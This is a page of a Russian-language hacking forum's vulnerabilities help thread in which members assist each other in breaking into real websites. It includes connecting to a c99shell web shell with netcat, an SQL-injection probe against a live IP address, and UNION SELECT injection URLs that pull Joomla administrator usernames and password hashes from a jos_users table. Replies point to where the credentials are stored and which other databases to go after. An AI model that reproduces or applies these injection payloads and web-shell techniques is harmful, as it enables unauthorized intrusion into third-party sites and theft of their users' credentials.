HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1618 из 2438 « Первая < 6181118151815681608 1614 1615 1616 1617 1618 1619 1620 1621 1622 1628166817182118 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #16171  
Старый 19.01.2011, 18:49
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию
Цитата:
Сообщение от Konqi  
Konqi said:
я чо то не понимаю тебя, ты откуда запускаеш неткат?
шелл то тут причем, открыл порт через шелл, щас забудь о шелле , открой неткат и каннектись
Так и сделал все отлично законнектилось (попросил пасс, ввел его) дальше пишет

welcome to c99shell

/bin/bash: not found

на винде в консоле которую nc запускал и дальше висит

Через Back connection: пришлось делать спасибо большое за ответы
 
Ответить с цитированием

  #16172  
Старый 19.01.2011, 20:34
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
http://188.230.77.4:80/src/damagetypes.php?id=%bf'%bf"

помогите раскрутить иньекцию. Вообщем сканерюга выдает ошибку SQL, но UNION , ORDER BY и GROUP BY не работают, и база даных реагирует только на кирилицу и только тогда виплевывает ошыбку, может кто то что то подскажет потому что я уже мозги сломал. Помогите пожалуйста, посмотрите что можна сделать!
 
Ответить с цитированием

  #16173  
Старый 19.01.2011, 20:48
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
pirat0

Ну если не знаешь о чем ошибка,то вбей ее в гугл или религия не позволяет?

Двиг скачал бы,а не фигней страдал=\

src/damagetypes.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
src/include/functions_common.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
src/include/functions_db.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Кароче там надо разбираться,желания у меня нету,но запрос с ковычками у тебя уже точно не пройдет,т.к. даже если мг=офф,то еддслешес.

А сама ошибка вызвана кодировками.
 
Ответить с цитированием

  #16174  
Старый 19.01.2011, 22:12
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
~d0s~ спс буду разбиратса, но чувствую врятли что то у меня получитса((, может подскажеш что куда нада тыкать (ну в смисле не в глобальном плане "юзай гугл")
 
Ответить с цитированием

  #16175  
Старый 20.01.2011, 14:29
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Как пользоваться php-иньекциями в Windows? Какие стандартные пут к файлам чтоб заполучить доступ?
 
Ответить с цитированием

  #16176  
Старый 20.01.2011, 14:36
Skipp
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215

Репутация: 0
По умолчанию
Подскажите, попадаются такого вида таблицы. В них есть что-нибудь полезное, или нет. Версия 5.1.44-community-log

Код:
Code:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
PAGE_COUNTER
answer
klimat
klimat0001
poll
poll_ip
poll_main
poll_topics
jos_banner
jos_bannerclient
jos_bannertrack
jos_categories
jos_components
jos_contact_details
jos_content
jos_content_frontpage
jos_content_rating
jos_core_acl_aro
jos_core_acl_aro_groups
jos_core_acl_aro_map
jos_core_acl_aro_sections
jos_core_acl_groups_aro_map
jos_core_log_items
jos_core_log_searches
jos_csvi_configuration
jos_csvi_templates
jos_easypart
jos_easypart_badwords
jos_groups
jos_jce_extensions
jos_jce_groups
jos_jce_plugins
jos_jp_exclusion
jos_jp_inclusion
jos_jp_profiles
jos_jp_registry
jos_jp_stats
jos_jp_temp
jos_liex_id_linker
jos_linkexchange_categ
 
Ответить с цитированием

  #16177  
Старый 20.01.2011, 15:00
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию
Цитата:
Сообщение от Skipp  
Skipp said:
Подскажите, попадаются такого вида таблицы. В них есть что-нибудь полезное, или нет. Версия
5.1.44-community-log
да ничего полезного там, всякая ненужная мелочь вроде логина-пароля от админки джумлы в таблице jos_users
 
Ответить с цитированием

  #16178  
Старый 20.01.2011, 15:23
xarko_v
Guest
Сообщений: n/a
Провел на форуме:
3318

Репутация: 0
По умолчанию
Цитата:
Сообщение от Skipp  
Skipp said:
Подскажите, попадаются такого вида таблицы. В них есть что-нибудь полезное, или нет. Версия
5.1.44-community-log
ti pomoemu group_concat() zdelal..i group_concat() ne vidaet bolse 1024 simvolov..zdelay concat() s limit-om..

i u tebya tam kajetsya joomla..tam dlya tebe est tablica kotoriy group_concat() virezal : jos_users

//транслитом не писать!, предупреждаю.
 
Ответить с цитированием

  #16179  
Старый 20.01.2011, 16:44
Skipp
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215

Репутация: 0
По умолчанию
Я получил колонки из jos_users

Цитата:
Сообщение от None  
id:name:username:email: password:usertype:block:sendEmail:gid:registerDate :lastvisitDate:activation: params
Но информация из username и password не выводится, в чём причина?

Пишет ошибку

Цитата:
Сообщение от None  
Invalid query "select * from klimat where id=2654 and 1=0 union select 1,2,3,4,5,6,7,8,group_concat(concat_ws(0x3a3a3a,us er name,password) separator 0x0b),10,11,12,13,14,15,16,17,18,19,20 from jos_users limit 0,20-- "
Цитата:
Сообщение от None  
http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+jos_users+limit+0,1--+
И так не выводит

Цитата:
Сообщение от None  
http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,group_concat(concat_ws(0x3a3a3a,user name,password)+separator+0x0b),10,11,12,13,14,15,1 6,17,18,19,20+from+jos_users+limit+0,20--+
 
Ответить с цитированием

  #16180  
Старый 20.01.2011, 17:42
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
Цитата:
Сообщение от Skipp  
Skipp said:
Я получил колонки из jos_users
Но информация из username и password не выводится, в чём причина?
Пишет ошибку
И так не выводит
я не буду говорить как, дам наводку, там 3 базы..

belklimat

bestshop_bestshop

bestshop_plenki

чуешь?
 
Ответить с цитированием
Ответ
Страница 1618 из 2438 « Первая < 6181118151815681608 1614 1615 1616 1617 1618 1619 1620 1621 1622 1628166817182118 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ